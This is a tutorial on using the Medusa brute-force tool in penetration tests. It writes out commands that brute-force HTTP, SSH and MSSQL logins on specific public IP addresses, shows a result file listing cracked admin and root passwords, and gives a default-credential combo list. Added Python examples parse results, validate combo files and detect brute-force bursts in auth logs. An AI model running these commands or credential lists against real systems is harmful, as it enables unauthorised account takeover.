Brute force attacks with Medusa
There are many tools (Medusa, Hydra, Bruter, Metasploit auxiliary modules, etc.) for brute force attacks, which are constantly needed in penetration tests. In this article we show how to use Medusa and how the desired user accounts can be tried against different services.
For example, the following command reads the usernames and passwords to try from files, brute-forces the HTTP service (TCP/80), additionally tries an empty password and the username as the password (-e ns), writes the successful findings to result.txt (-O) and runs 10 login attempts in parallel (-t 10):
root@bt:~/Desktop# medusa -U user.txt -P pass.txt -M http -h 140.127.190.184 -t 10 -e ns -O result.txt
The result file logs the start and end time of the scan, together with the accounts that were found and any attempts that ended in an unknown error.
root@bt:~/Desktop# cat result.txt
#Medusa v.2.1.1 (2013-02-09 22:03:58)
# medusa -U user.txt -P pass.txt -M http -h 140.127.190.184 -t 10 -e ns -O result.txt
ACCOUNT FOUND: [http] Host: 140.127.190.184 User: admin Password: 1234 [SUCCESS]
ACCOUNT FOUND: [http] Host: 140.127.190.184 User: root Password: 1234 [SUCCESS]
# Medusa has finished (2013-02-09 22:04:18).
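Because the result file has the fixed line format shown above, it is easy to turn a long run into a structured finding list. The following parser is an added example and is not part of Medusa or of the original article; the sample result text is constructed from the format above, with an RFC 5737 documentation address standing in for the host. Any non-comment line the parser does not recognise (for example an error line) is kept for manual review rather than dropped.

```python
import re
from datetime import datetime

# Constructed sample of a Medusa -O result file, in the format shown above
# (192.0.2.10 is a documentation address, not a real host).
SAMPLE_RESULT = """\
#Medusa v.2.1.1 (2013-02-09 22:03:58)
# medusa -U user.txt -P pass.txt -M http -h 192.0.2.10 -t 10 -e ns -O result.txt
ACCOUNT FOUND: [http] Host: 192.0.2.10 User: admin Password: 1234 [SUCCESS]
ACCOUNT FOUND: [http] Host: 192.0.2.10 User: root Password: 1234 [SUCCESS]
# Medusa has finished (2013-02-09 22:04:18).
"""

TS_FMT = "%Y-%m-%d %H:%M:%S"
START_RE = re.compile(r"^#\s*Medusa v\.?(?P<version>\S+) \((?P<ts>[\d: -]+)\)")
END_RE = re.compile(r"^#\s*Medusa has finished \((?P<ts>[\d: -]+)\)")
FOUND_RE = re.compile(
    r"^ACCOUNT FOUND: \[(?P<module>[^\]]+)\] Host: (?P<host>\S+) "
    r"User: (?P<user>.*?) Password: (?P<password>.*?) \[(?P<status>[^\]]+)\]$"
)

def parse_medusa_result(text):
    """Parse a Medusa result file into scan times, found accounts and any
    non-comment lines the parser does not recognise (kept for review)."""
    report = {"version": None, "started": None, "finished": None,
              "found": [], "unrecognised": []}
    for line in text.splitlines():
        line = line.rstrip()
        if not line:
            continue
        if m := START_RE.match(line):
            report["version"] = m["version"]
            report["started"] = datetime.strptime(m["ts"], TS_FMT)
        elif m := END_RE.match(line):
            report["finished"] = datetime.strptime(m["ts"], TS_FMT)
        elif m := FOUND_RE.match(line):
            report["found"].append(m.groupdict())
        elif not line.startswith("#"):
            # Error or otherwise unexpected output: keep it instead of silently dropping it.
            report["unrecognised"].append(line)
    if report["started"] and report["finished"]:
        report["duration_seconds"] = (report["finished"] - report["started"]).total_seconds()
    return report

def shared_passwords(report):
    """Map each password that unlocked more than one account to those accounts;
    password reuse across accounts is usually the first finding worth reporting."""
    by_password = {}
    for acct in report["found"]:
        by_password.setdefault(acct["password"], []).append(f"{acct['host']}:{acct['user']}")
    return {p: accts for p, accts in by_password.items() if len(accts) > 1}

if __name__ == "__main__":
    result = parse_medusa_result(SAMPLE_RESULT)
    print(f"scan took {result['duration_seconds']:.0f}s, {len(result['found'])} account(s) found")
    for password, accounts in shared_passwords(result).items():
        print(f"password {password!r} is shared by: {', '.join(accounts)}")
```

Run it against a real result file by replacing SAMPLE_RESULT with the file's contents; the duration and the shared-password summary are what typically go into the report, while the unrecognised list tells you whether the run hit errors that need a second look.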
Medusa can also attack a service that is not listening on its default port; the port is given with -n. For example, a brute force attack against an SSH service running on port 443 instead of the default SSH port:
root@bt:~/Desktop# medusa -U user.txt -P pass.txt -M ssh -h 85.95.238.172 -n 443 -t 10 -O result.txt -e ns
To read usernames and passwords from a single file, use the -C option. Each line of the combo file has the form host:user:password; when the host field is left empty, as below, the host is taken from -h. The content of the userpass.txt used here is as follows:
:admin:admin
:admin:1234
:admin:adminadmin
:radware:radware
:test:test
:test:test123
:admin:123456
:admin:12345678
:test:test
:admin:A12345
:admin:A123456
:admin:qwerty
root@bt:~/Desktop# medusa -C userpass.txt -M ssh -h 85.95.238.172 -n 443 -t 10 -O result.txt -e ns
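A combo file is easy to get wrong (a missing colon, a duplicate line such as test:test above, or a field that then also has to be given on the command line), so it is worth validating before a run. The following check is an added example, not part of Medusa or of the original article; the sample combo text is constructed from the file above. Splitting each line on the first two colons only, so that a password containing ':' survives, is an assumption made here, as is the mapping of empty fields to the -h/-H, -u/-U and -p/-P options.

```python
# Constructed copy of the combo file format shown above: host:user:password per
# line, with the host field left empty so that the host comes from -h.
SAMPLE_COMBO = """\
:admin:admin
:admin:1234
:test:test
:test:test123
:test:test
:admin:qwerty
"""

def parse_combo_file(text):
    """Split combo lines into (host, user, password) tuples.
    Assumption: only the first two colons separate fields, so a password
    may itself contain ':'. Blank lines and '#' comments are skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":", 2)
        if len(parts) != 3:
            raise ValueError(f"line {lineno}: expected host:user:password, got {raw!r}")
        entries.append(tuple(parts))
    return entries

def combo_summary(entries):
    """Drop duplicate lines (keeping first occurrence) and report which fields are
    empty somewhere and therefore must be supplied on the command line
    (assumed mapping: host -> -h/-H, user -> -u/-U, password -> -p/-P)."""
    unique = list(dict.fromkeys(entries))
    return {
        "total": len(entries),
        "unique": len(unique),
        "needs_host": any(h == "" for h, _, _ in unique),
        "needs_user": any(u == "" for _, u, _ in unique),
        "needs_password": any(p == "" for _, _, p in unique),
        "entries": unique,
    }

if __name__ == "__main__":
    summary = combo_summary(parse_combo_file(SAMPLE_COMBO))
    print(f"{summary['total']} lines, {summary['unique']} unique")
    for field in ("host", "user", "password"):
        if summary[f"needs_{field}"]:
            print(f"{field} is empty on some lines: supply it on the command line")
```

Deduplicating matters more than it looks: every duplicate line is one more failed login against an account that may be protected by a lockout policy, so the cleaned list is the one to feed to -C.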
With -d, Medusa lists all the service modules it can brute-force. The module is selected with -M, giving its name without the .mod extension; for http.mod, -M http is enough.
root@bt:~/Desktop# medusa -d
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
Available modules in "." :
Available modules in "/usr/local/lib/medusa/modules":
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
+ http.mod : Brute force module for HTTP : version 2.0
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ ncp.mod : Brute force module for NCP sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0
+ svn.mod : Brute force module for Subversion sessions : version 2.0
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.1
+ web-form.mod : Brute force module for web forms : version 2.1
+ wrapper.mod : Generic Wrapper Module : version 2.0
To see the options of a module (here, the web-form module), query it with -q:
root@bt:~/Desktop# medusa -M web-form -q
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
web-form.mod (2.1) Luciano Bello <luciano@linux.org.ar> :: Brute force module for web forms
Available module options:
USER-AGENT:? User-agent value. Default: "I'm not Mozilla, I'm Ming Mong".
FORM:? Target form to request. Default: "/"
DENY-SIGNAL:? Authentication failure message. Attempt flagged as successful if text is not present in
server response. Default: "Login incorrect"
CUSTOM-HEADER:? Custom HTTP header.
More headers can be defined by using this option several times.
FORM-DATA:<METHOD>?<FIELDS>
Methods and fields to send to web service. Valid methods are GET and POST. The actual form
data to be submitted should also be defined here. Specifically, the fields: username and
password. The username field must be the first, followed by the password field.
Default: "post?username=&password="
Usage example: "-M web-form -m USER-AGENT:"g3rg3 gerg" -m FORM:"webmail/index.php" -m DENY-SIGNAL:"deny!"
-m FORM-DATA:"post?user=&pass=&submit=True" -m CUSTOM-HEADER:"Cookie: name=value"
A command like the following can be used for a brute force attack on an MSSQL server (-T sets how many hosts are tested concurrently, -t how many logins are attempted in parallel per host):
root@bt:~/Desktop# medusa -C userpass.txt -M mssql -h 85.95.237.14 -t 10 -O result.txt -e ns -T 20
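Runs like the ones above are noisy: with -t 10, a single source produces many failed logins per second, and a success that immediately follows a burst of failures from the same source is the event a defender most needs to see. The following detector is an added example, not part of Medusa or of the original article; the sshd log lines are constructed (documentation addresses only) to resemble what the SSH example above would leave in a Linux auth log. The syslog year and the 5-failures-in-60-seconds threshold are assumptions chosen for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log lines: a burst of failures from one source followed by a
# success, then an unrelated single failure and a normal login from another host.
SAMPLE_AUTH_LOG = """\
Feb  9 22:03:58 bastion sshd[1201]: Failed password for invalid user test from 198.51.100.7 port 51001 ssh2
Feb  9 22:03:58 bastion sshd[1202]: Failed password for admin from 198.51.100.7 port 51002 ssh2
Feb  9 22:03:59 bastion sshd[1203]: Failed password for admin from 198.51.100.7 port 51003 ssh2
Feb  9 22:03:59 bastion sshd[1204]: Failed password for invalid user radware from 198.51.100.7 port 51004 ssh2
Feb  9 22:04:00 bastion sshd[1205]: Failed password for admin from 198.51.100.7 port 51005 ssh2
Feb  9 22:04:01 bastion sshd[1206]: Failed password for root from 198.51.100.7 port 51006 ssh2
Feb  9 22:04:03 bastion sshd[1207]: Accepted password for admin from 198.51.100.7 port 51007 ssh2
Feb  9 22:15:40 bastion sshd[1300]: Failed password for alice from 203.0.113.5 port 40001 ssh2
Feb  9 22:16:02 bastion sshd[1301]: Accepted password for alice from 203.0.113.5 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def parse_line(line, year=2013):
    """Parse one sshd password-auth line; syslog has no year, so one is assumed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "ok": m["result"] == "Accepted", "user": m["user"], "ip": m["ip"]}

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Sliding-window detector per source IP.
    medium: at least `threshold` failed logins within `window_seconds`.
    high:   a successful login from a source that is currently over the threshold."""
    alerts = []
    recent = defaultdict(deque)   # ip -> failures (ts, user) still inside the window
    flagged = set()               # ips already reported at medium severity
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        window = recent[ev["ip"]]
        while window and (ev["ts"] - window[0][0]).total_seconds() > window_seconds:
            window.popleft()      # expire failures older than the window
        if not ev["ok"]:
            window.append((ev["ts"], ev["user"]))
            if len(window) >= threshold and ev["ip"] not in flagged:
                flagged.add(ev["ip"])
                alerts.append({"severity": "medium", "ip": ev["ip"], "at": ev["ts"],
                               "failures": len(window),
                               "users": sorted({u for _, u in window})})
        elif len(window) >= threshold:
            alerts.append({"severity": "high", "ip": ev["ip"], "at": ev["ts"],
                           "user": ev["user"], "failures_before_success": len(window)})
    return alerts

if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(a["severity"].upper(), a["ip"], a["at"].strftime("%H:%M:%S"), a)
```

The distinct user list in the medium alert separates a password guess against one account from a spray across many (test, radware, admin, root above, which mirrors the combo file earlier in the article). The same structure applies to HTTP basic-auth 401 bursts or MSSQL login-failed events; only the line regex changes.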